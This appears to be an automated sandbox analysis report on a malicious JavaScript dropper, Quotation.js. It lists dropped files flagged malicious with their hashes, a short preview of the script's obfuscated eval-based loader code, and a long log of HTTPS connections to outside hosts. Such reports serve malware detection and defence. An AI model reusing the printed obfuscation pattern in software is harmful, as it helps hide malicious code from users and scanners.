
Download File

Process:	C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2819679044442764
Encrypted:	false
SSDEEP:	96:pKprln8GPLCwMkcx6lgwm/buunSSTucHG1bow4L5:pK38GPLCwMkcx6cjuuRJHGd
MD5:	3BB35DB1755EF59E9BC0FB12162844DA
SHA1:	65BA04DA485966B59E33288CA82AD6565A4CBB0A
SHA-256:	C438E45DE750FAE83099EC654207A43AFF1756CDF8E48BA8D6628F81147C6FB9
SHA-512:	9DBAFFD0A50CB0A5C49955AEE89905E160F7B7735917FF940A2E1F9148A045537E7D819CB6FEA13DFDA98D040DA3F725CB18DE7F0DB3EA5E55B58B0BC04F306B
Malicious:	false
Reputation:	low
Preview:	.........8......./..... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..T.......8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
File Type:	data
Category:	dropped
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwlt7n:WNn
MD5:	C8366AE350E7019AEFC9D1E6E6A498C6
SHA1:	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
SHA-256:	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
SHA-512:	33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................J2SE.

C:\Users\user\AppData\Roaming\nvbyatbnf.txt

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	94792
Entropy (8bit):	7.909093914574828
Encrypted:	false
SSDEEP:	1536:v2/v1An0P1t9Q51+jiMcd5nGSuPsw470upL6ejNT1HJhehVCHGvevxTpGHr0S:v2qn0P1DQ2jkGLPZ4Au96ehTchV7vfLd
MD5:	2543BEB989715570292D7263B60BAB1A
SHA1:	EBB68838C9CE8F235349C2616BDD65F294B271EE
SHA-256:	3EC814FCFF2491C0863B5D5E5E26AF3799BAE70BC7FA4768CB5FBAC74F0E0CAB
SHA-512:	C47B6F843BCC4906B03E011B0405B4BFB3BB65422E14FD6DD8BC7BC4975E055D5E93A3562C0031DCB065649D82B8E5CA30CF1279044BEA572EB5C9EE30A264DB
Malicious:	true
Reputation:	low
Preview:	PK..........VY................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5\|.Y.~.m..5XL.8.(WXkV.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.\|.....s...%.u....0..>8.8..PK...&......-...PK..........VY................carLambo/resources/config.txt.... ..........&..5..d.(Q...\.~...BhP>]...5...>J3...\...?....%`I;(8.p...2`.....{g.D}......T.J...._.,3C.R.\|.U...hb.....H.)&..' R..P....-..&.3m....`.>.^u........;.....c?Bw.~...PK....,........PK..........VY................carLambo/sfsrgsbd.class.Wy\|T....,y/.!.d!.([.1CXB.$.D,.D...@.L..,0..y/.T"....v....5UiM.v....l..b.E....V...=..d&........w.=..s....=.....P........L.0.oV...&......F...N...n..H..0*!"..I.....1.... .+....%._............_...._.xZ.3"~-.7"~+.w"~..EP.\|.~.^.~...C.73.ex.......t,..2..p.."..T...F.72..p.a..q..+.g.b\o#/o`.2.......a..3x.B....G...Af8..6.^...#6..JE.n.....n.@%..x..g...'.>k...._.....>.p.'.....v\|.G.....v<.O..c\|...=

Static File Info

General

File type:	ASCII text, with very long lines (64560)
Entropy (8bit):	4.686169483568645
TrID:
File name:	Quotation.js
File size:	749'389 bytes
MD5:	c3e39b8ea6a8813ffb4001cbd044a027
SHA1:	36dc1ec5510e2531b23931b317e25ae2240df789
SHA256:	1cef3a638243fd070d898fb3edabf7676d050246e736b73cdb9f23201d4f7858
SHA512:	b61d5c9935f383334a33dc713bcf7c3ede9cda7f21766c9f06da3bd07dd874115c18fc6d58cbd3f20b99297c4a9017eb5b998db60f437a2d42fe1756f490e1f6
SSDEEP:	6144:eQoo+DmkAh/CyDJuTg0lFPmx61HCLu+yHsWsLy+HiuNHW2Z5nJRU/pqFvVu77HEa:1+
TLSH:	1EF4D98656643A0797E3F934C322E123AD79E82328D721D77DC43A49AEB6C505DBDE30
File Content Preview:	String["prototype"].proc = function() { eval(this.toString());};.Array["prototype"]["\x75\x6E\x64\x65\x66\x69\x6E\x65\x64"] = function(xx, xy) {.[function (){.xx[3] = xy[0];xx[4] = xy[1];xx[5] = xy[2];.}][0]();.};.String.\u0070\u0072\u006f\u0074\u006f\u00

File Icon


Icon Hash:	68d69b8bb6aa9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 09:03:31.959697008 CET	49730	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:31.959744930 CET	443	49730	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:31.959822893 CET	49730	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:32.034401894 CET	49730	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:32.034436941 CET	443	49730	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:32.056238890 CET	49731	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.056288004 CET	443	49731	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:32.056350946 CET	49731	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.057598114 CET	49731	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.057614088 CET	443	49731	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:32.057822943 CET	49732	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.057867050 CET	443	49732	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:32.057929993 CET	49732	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.098619938 CET	49732	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.098664045 CET	443	49732	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:32.099234104 CET	49733	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.099284887 CET	443	49733	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:32.099385023 CET	49733	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.100503922 CET	49733	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:32.100519896 CET	443	49733	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.630140066 CET	443	49733	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.630217075 CET	49733	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.643496037 CET	443	49731	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.643564939 CET	49731	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.679734945 CET	443	49732	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.679812908 CET	49732	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.683927059 CET	443	49730	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:33.683999062 CET	49730	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:33.688728094 CET	49731	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.688733101 CET	49732	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.688751936 CET	443	49732	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.688752890 CET	443	49731	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.688963890 CET	49732	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.688994884 CET	49731	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.689062119 CET	49733	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.689095974 CET	443	49733	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.689120054 CET	49733	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.689146042 CET	49730	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:33.689166069 CET	443	49730	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:33.689199924 CET	49730	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:33.689356089 CET	443	49730	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:33.689393997 CET	49730	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:33.689456940 CET	443	49732	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.689507961 CET	49732	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.689589024 CET	443	49731	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.689641953 CET	49731	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:33.689933062 CET	443	49733	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:33.689985037 CET	49733	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.702771902 CET	49734	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.702825069 CET	443	49734	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:38.702899933 CET	49734	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.707421064 CET	49734	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.707433939 CET	443	49734	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:38.708049059 CET	49735	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.708102942 CET	443	49735	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:38.708169937 CET	49735	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.711333036 CET	49735	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.711352110 CET	443	49735	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:38.712145090 CET	49736	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:38.712176085 CET	443	49736	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:38.712294102 CET	49736	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:38.712917089 CET	49736	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:38.712932110 CET	443	49736	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:38.713411093 CET	49737	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.713430882 CET	443	49737	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:38.713484049 CET	49737	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.714735985 CET	49737	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:38.714745045 CET	443	49737	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:39.924109936 CET	443	49737	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:39.924206972 CET	49737	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:39.925771952 CET	49737	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:39.925784111 CET	443	49737	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:39.925872087 CET	49737	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:39.925955057 CET	443	49737	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:39.926001072 CET	49737	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.296317101 CET	443	49734	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:40.296418905 CET	49734	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.296698093 CET	443	49735	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:40.296782970 CET	49735	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.297841072 CET	49735	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.297852993 CET	443	49735	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:40.297952890 CET	49735	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.298038960 CET	443	49735	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:40.298096895 CET	49735	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.298866987 CET	49734	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.298877954 CET	443	49734	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:40.299043894 CET	49734	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.299068928 CET	443	49734	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:40.299141884 CET	49734	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:40.333506107 CET	443	49736	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:40.333599091 CET	49736	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:40.334556103 CET	49736	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:40.334564924 CET	443	49736	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:40.334652901 CET	49736	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:40.334729910 CET	443	49736	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:40.334779978 CET	49736	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:44.937931061 CET	49739	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:44.937990904 CET	443	49739	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:44.938075066 CET	49739	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:44.947279930 CET	49739	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:44.947293043 CET	443	49739	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:45.311718941 CET	49740	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:45.311769009 CET	443	49740	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:45.312033892 CET	49741	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:45.312081099 CET	443	49741	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:45.312088013 CET	49740	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:45.312165976 CET	49741	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:45.312875032 CET	49740	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:45.312886953 CET	443	49740	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:45.313245058 CET	49741	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:45.313263893 CET	443	49741	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:45.343447924 CET	49742	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:45.343496084 CET	443	49742	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:45.343741894 CET	49742	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:45.345278025 CET	49742	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:45.345298052 CET	443	49742	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:46.478013039 CET	443	49739	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.478112936 CET	49739	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.479722977 CET	49739	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.479732990 CET	443	49739	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.479809046 CET	49739	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.479921103 CET	443	49739	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.479979992 CET	49739	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.892342091 CET	443	49740	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.892513990 CET	49740	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.893882990 CET	49740	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.893898010 CET	443	49740	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.894090891 CET	49740	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.894097090 CET	443	49740	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.894107103 CET	443	49740	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.905797005 CET	443	49741	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.905929089 CET	49741	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.907004118 CET	49741	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.907016993 CET	443	49741	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.907038927 CET	49741	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:46.907238960 CET	443	49741	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:46.907332897 CET	49741	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:47.049098969 CET	443	49742	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:47.049200058 CET	49742	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:47.051008940 CET	49742	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:47.051019907 CET	443	49742	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:47.051193953 CET	443	49742	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:47.051246881 CET	49742	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:47.051254034 CET	443	49742	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:47.051275969 CET	49742	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:47.103328943 CET	443	49740	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:47.103461027 CET	49740	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.470990896 CET	49747	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.471040010 CET	443	49747	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:51.471107006 CET	49747	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.475275993 CET	49747	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.475290060 CET	443	49747	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:51.905563116 CET	49748	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.905597925 CET	443	49748	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:51.905657053 CET	49748	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.906588078 CET	49748	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.906605005 CET	443	49748	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:51.921155930 CET	49749	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.921211958 CET	443	49749	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:51.921298981 CET	49749	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.922084093 CET	49749	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:51.922107935 CET	443	49749	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:52.061961889 CET	49750	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:52.062007904 CET	443	49750	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:52.062083006 CET	49750	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:52.062839985 CET	49750	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:52.062855005 CET	443	49750	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:52.729871035 CET	443	49747	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:52.729943991 CET	49747	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:52.731087923 CET	49747	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:52.731105089 CET	443	49747	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:52.731195927 CET	49747	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:52.731260061 CET	443	49747	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:52.731308937 CET	49747	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.115777016 CET	443	49748	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:53.115894079 CET	49748	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.117319107 CET	49748	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.117340088 CET	443	49748	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:53.117434978 CET	49748	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.117532015 CET	443	49748	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:53.117602110 CET	49748	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.127815962 CET	443	49749	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:53.127911091 CET	49749	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.128911972 CET	49749	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.128917933 CET	443	49749	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:53.128985882 CET	49749	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.129041910 CET	443	49749	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:53.131772041 CET	49749	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:53.694320917 CET	443	49750	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:53.694464922 CET	49750	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:53.695998907 CET	49750	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:53.696007967 CET	443	49750	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:53.696168900 CET	49750	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:53.696228027 CET	443	49750	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:53.696329117 CET	49750	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:57.718060017 CET	49752	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:57.718120098 CET	443	49752	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:57.718311071 CET	49752	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:57.718976974 CET	49752	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:57.718991041 CET	443	49752	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.124233007 CET	49753	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.124279976 CET	443	49753	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.124371052 CET	49753	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.125103951 CET	49753	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.125116110 CET	443	49753	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.139702082 CET	49754	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.139736891 CET	443	49754	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.139833927 CET	49754	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.140425920 CET	49754	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.140438080 CET	443	49754	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.686640978 CET	49755	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:58.686696053 CET	443	49755	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:58.686777115 CET	49755	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:58.687617064 CET	49755	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:03:58.687627077 CET	443	49755	20.233.83.145	192.168.2.4
Nov 26, 2024 09:03:58.934351921 CET	443	49752	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.934497118 CET	49752	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.936491966 CET	49752	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.936501026 CET	443	49752	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.936604023 CET	49752	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:58.936661959 CET	443	49752	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:58.936713934 CET	49752	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.376981974 CET	443	49753	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:59.377067089 CET	49753	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.382363081 CET	49753	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.382368088 CET	443	49753	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:59.382458925 CET	49753	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.382592916 CET	443	49753	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:59.382648945 CET	49753	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.393209934 CET	443	49754	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:59.393309116 CET	49754	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.394499063 CET	49754	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.394510984 CET	443	49754	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:59.394644022 CET	49754	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:03:59.394653082 CET	443	49754	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:59.394663095 CET	443	49754	199.232.192.209	192.168.2.4
Nov 26, 2024 09:03:59.394696951 CET	49754	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:00.364959955 CET	443	49755	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:00.365051985 CET	49755	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:00.370162010 CET	49755	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:00.370182037 CET	443	49755	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:00.370323896 CET	49755	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:00.370469093 CET	443	49755	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:00.370516062 CET	49755	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:03.937809944 CET	49756	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:03.937877893 CET	443	49756	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:03.937988997 CET	49756	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:03.938714981 CET	49756	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:03.938730001 CET	443	49756	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:04.389772892 CET	49757	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:04.389811039 CET	443	49757	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:04.389940977 CET	49757	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:04.390594006 CET	49757	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:04.390610933 CET	443	49757	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:04.405316114 CET	49758	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:04.405361891 CET	443	49758	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:04.405431986 CET	49758	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:04.405947924 CET	49758	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:04.405957937 CET	443	49758	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.237521887 CET	443	49756	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.237673998 CET	49756	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.238868952 CET	49756	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.238881111 CET	443	49756	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.239034891 CET	49756	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.239034891 CET	443	49756	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.239048958 CET	443	49756	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.239088058 CET	49756	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.532114983 CET	49759	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:05.532175064 CET	443	49759	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:05.532293081 CET	49759	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:05.534216881 CET	49759	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:05.534226894 CET	443	49759	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:05.612288952 CET	443	49758	199.232.192.209	192.168.2.4
